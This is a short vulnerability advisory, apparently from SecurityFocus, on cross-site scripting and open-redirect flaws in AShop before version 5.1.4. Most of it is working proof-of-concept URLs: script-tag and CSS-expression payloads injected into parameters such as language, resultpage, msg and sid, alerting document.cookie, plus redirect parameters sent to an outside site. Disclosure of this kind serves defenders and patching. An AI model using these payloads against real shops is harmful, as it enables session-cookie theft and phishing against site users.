27 lines
No EOL
1.6 KiB
Text
27 lines
No EOL
1.6 KiB
Text
source: https://www.securityfocus.com/bid/50616/info
|
|
|
|
AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
|
|
|
|
Versions prior to AShop 5.1.4 are vulnerable.
|
|
|
|
IE8
|
|
|
|
http://www.example.com/ashop/?'"<script>alert(document.cookie)</script>
|
|
http://www.example.com/ashop/index.php?'"<script>alert(document.cookie)</script>
|
|
http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
|
|
http://www.example.com/ashop/index.php?language='"<script>alert(document.cookie)</script>
|
|
|
|
FF 7.1
|
|
|
|
http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
|
|
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script><script>alert(document.cookie)</script>&msg=
|
|
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</script><script>alert(document.cookie)</script>
|
|
http://www.example.com/ashop/basket.php?cat=0&sid='"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
|
|
|
|
Open Redirection
|
|
|
|
http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
|
|
http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
|
|
http://www.example.com/ashop/currency.php?redirect=http://www.google.com |